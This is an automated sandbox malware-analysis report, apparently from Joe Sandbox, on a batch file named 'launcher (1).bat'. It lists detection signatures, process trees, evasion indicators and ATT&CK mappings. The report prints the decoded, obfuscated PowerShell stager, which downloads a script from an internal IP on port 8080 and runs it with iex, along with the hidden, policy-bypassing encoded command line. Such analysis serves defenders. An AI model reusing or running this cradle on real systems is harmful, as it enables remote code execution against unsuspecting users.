
Windows Analysis Report
launcher (1).bat

Overview

General Information

Sample name: launcher (1).bat
Analysis ID: 1669989
MD5: 30626221f424c91a9b503a49c29f2a80
SHA1: ef1aaef2d0993567f67bb4473ac1e44773f9fd8f
SHA256: c65fe988dd48cf30fa0fb559cad98035abc06b753fe39f89c0e15d47e55142b4
Tags: bat, user-smica83

Detection

Score: 68
Range: 0 - 100
Confidence: 100%

Signatures

Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Yara detected Obfuscated Powershell
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

[Classification chart: axes Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale clean / suspicious / malicious]
  • System is w10x64
  • cmd.exe (PID: 8004 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\launcher (1).bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8060 cmdline: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source           | Rule                             | Description                         | Author       | Strings
launcher (1).bat | JoeSecurity_ObfuscatedPowershell | Yara detected Obfuscated Powershell | Joe Security |

    System Summary

    Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community; Data: Command: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc 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, CommandLine: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc 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, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc 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, CommandLine: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc 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, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: Process started; Author: frack113; Data: Command: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc [long base64 -Enc argument omitted], CommandLine: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc 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, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc 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, CommandLine: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc [long base64 -Enc argument omitted], CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc 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, CommandLine: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc [long base64 -Enc argument omitted], CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    No Suricata rule has matched


    AV Detection

    Source: Submitted Sample; Neural Call Log Analysis: 87.1%
    Source: Binary string: softy.pdb source: powershell.exe, 00000002.00000002.1511357339.00000223BDCD7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tomation.pdb source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1512483621.00000223BDF0C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: m.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbp$ source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1512483621.00000223BDF0C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.1512483621.00000223BDEC2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Q.pdb;/T:- source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1511357339.00000223BDC80000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1512483621.00000223BDEC2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvice source: powershell.exe, 00000002.00000002.1511357339.00000223BDCD7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbB$ source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.1512483621.00000223BDF0C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1512483621.00000223BDEC2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: soft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1512483621.00000223BDF0C000.00000004.00000020.00020000.00000000.sdmp
    Source: powershell.exe, 00000002.00000002.1494598884.00000223A7150000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://192.168.101.128:8080
    Source: powershell.exe, 00000002.00000002.1494598884.00000223A7150000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://192.168.101.128:8080/download/powershell/
    Source: powershell.exe, 00000002.00000002.1507627224.00000223B5C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000002.1494598884.00000223A5CD3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000002.00000002.1494598884.00000223A5AA1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000002.00000002.1494598884.00000223A5CD3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000002.00000002.1494598884.00000223A5AA1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000002.00000002.1494598884.00000223A5CD3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000002.00000002.1494598884.00000223A6C38000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
    Source: powershell.exe, 00000002.00000002.1507627224.00000223B5C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
    Source: classification engine; Classification label: mal68.evad.winBAT@4/5@0/1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ac0leksk.bvs.ps1
    Source: unknown; Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\launcher (1).bat" "
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc 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
    Source: C:\Windows\System32\cmd.exe; Section loaded: cmdext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasapi32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasman.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rtutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winhttp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dnsapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winnsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

    Data Obfuscation

    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc 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
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FF7C7EB00BD pushad ; iretd 2_2_00007FF7C7EB00C1
    Source: C:\Windows\System32\cmd.exe; Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5003
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4829
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112 Thread sleep count: 5003 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112 Thread sleep count: 4829 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: powershell.exe, 00000002.00000002.1512483621.00000223BDEC2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc 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
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded .("{2}{1}{0}"-f 'E','Iabl','SEt-VaR') ('T'+'3SZP1') ( [Type]("{0}{1}{2}{3}{4}"-f'N','eT','.CRedEntIaL','c','AChe') ) ; (&("{2}{1}{0}" -f't','c','New-Obje') ("{2}{3}{1}{0}"-f 't','n','Net','.WebClie'))."PRO`Xy"."cReD`eNTi`A`ls"= ( &("{0}{1}"-f 'it','eM') ("VARIAb"+"L"+"E:T"+"3szP"+"1") )."vaL`Ue"::"d`EfaULtnEtWORK`c`Re`DEntIaLS";&("{1}{0}"-f 'r','iw')(("{2}{8}{4}{9}{1}{3}{7}{0}{5}{6}"-f'oad/power','.12','http://','8:8080/','2','shell','/','downl','19','.168.101'))-UseBasicParsing|&("{1}{0}"-f'x','ie')
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -nop -w 1 -ep bypass -enc iaagac4akaaiahsamgb9ahsamqb9ahsamab9acialqbmacaajwbfaccalaanaekayqbiagwajwasaccauwbfahqalqbwageauganackaiaagacgajwbuaccakwanadmauwbaafaamqanackaiaagacgaiabbafqaeqbwaguaxqaoaciaewawah0aewaxah0aewayah0aewazah0aewa0ah0aigatagyajwboaccalaanaguavaanacwajwauaemaugblagqarqbuahqasqbhaewajwasaccaywanacwajwbbaemaaablaccakqagacaakqagadsaiaagacgajgaoaciaewayah0aewaxah0aewawah0aigagac0azganahqajwasaccaywanacwajwboaguadwatae8aygbqaguajwapacaakaaiahsamgb9ahsamwb9ahsamqb9ahsamab9acialqbmacaajwb0accalaanag4ajwasaccatgblahqajwasaccalgbxaguaygbdagwaaqblaccakqapac4aigbqafiatwbgafgaeqaiac4aigbjafiazqbeagaazqboafqaaqbgaeeayabsahmaiga9acaaiaaoacaaiaamacgaigb7adaafqb7adeafqaiac0azgagaccaaqb0accalaanaguatqanackaiaagacgaigbwaeeaugbjaeeaygaiacsaigbmaciakwaiaeuaogbuaciakwaiadmacwb6afaaigaraciamqaiackaiaapac4aigb2ageatabgafuazqaiadoaogaiagqayabfagyayqbvaewadabuaeuadabxae8augblagaaywbgafiazqbgaeqarqbuahqasqbhaewauwaiadsajgaoaciaewaxah0aewawah0aigatagyaiaanahiajwasaccaaqb3accakqaoacgaigb7adiafqb7adgafqb7adqafqb7adkafqb7adeafqb7admafqb7adcafqb7adaafqb7aduafqb7adyafqaiac0azganag8ayqbkac8acabvahcazqbyaccalaanac4amqayaccalaanaggadab0ahaaogavac8ajwasaccaoaa6adgamaa4adaalwanacwajwayaccalaanahmaaablagwabaanacwajwavaccalaanagqabwb3ag4abaanacwajwaxadkajwasaccalgaxadyaoaauadeamaaxaccakqapac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcafaamacgaigb7adeafqb7adaafqaiac0azganahgajwasaccaaqblaccakqa=

    Language, Device and Operating System Detection

Source: Yara match; File source: launcher (1).bat, type: SAMPLE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
ATT&CK tactics and techniques (a leading number is the count of signatures matched for that technique):
Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development: 1 Scripting, Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: 1 Command and Scripting Interpreter, 3 PowerShell, At, Cron, Launchd, Scheduled Task
Persistence: 1 Scripting, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation: 11 Process Injection, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Defense Evasion: 1 Masquerading, 21 Virtualization/Sandbox Evasion, 11 Process Injection, 1 Deobfuscate/Decode Files or Information, 1 Obfuscated Files or Information, 1 DLL Side-Loading
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: 1 Security Software Discovery, 1 Process Discovery, 21 Virtualization/Sandbox Evasion, 1 Application Window Discovery, 11 System Information Discovery, Wi-Fi Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Command and Control: Data Obfuscation, Junk Data, Steganography, Protocol Impersonation, Fallback Channels, Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop

Behavior Graph (ID: 1669989, Sample: launcher (1).bat, Startdate: 20/04/2025, Architecture: WINDOWS, Score: 68)
• Sample: Sigma detected: Suspicious PowerShell Parameter Substring; Joe Sandbox ML detected suspicious sample; Yara detected Obfuscated Powershell; Sigma detected: Suspicious Encoded PowerShell Command Line
• cmd.exe (started by the sample): Suspicious powershell command line found; Encrypted powershell cmdline option found; Bypasses PowerShell execution policy
• powershell.exe (started by cmd.exe): contacts 192.168.101.128, port 8080 (unknown, unknown)
• conhost.exe (started by cmd.exe)

Source | Detection | Scanner | Label | Link
launcher (1).bat | 2% | Virustotal | | Browse
launcher (1).bat | 3% | ReversingLabs | |
SAMPLE | 100% | Joe Sandbox ML | |
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://192.168.101.128:8080/download/powershell/ | 0% | Avira URL Cloud | safe |
http://192.168.101.128:8080 | 0% | Avira URL Cloud | safe |


    No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1507627224.00000223B5C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.1494598884.00000223A5CD3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://192.168.101.128:8080/download/powershell/ | powershell.exe, 00000002.00000002.1494598884.00000223A7150000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.1494598884.00000223A5CD3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000002.00000002.1494598884.00000223A6C38000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1507627224.00000223B5C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://192.168.101.128:8080 | powershell.exe, 00000002.00000002.1494598884.00000223A7150000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1494598884.00000223A5AA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1494598884.00000223A5AA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.1494598884.00000223A5CD3000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
192.168.101.128 | | | | | |
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1669989
Start date and time: 2025-04-20 21:47:18 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 0s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
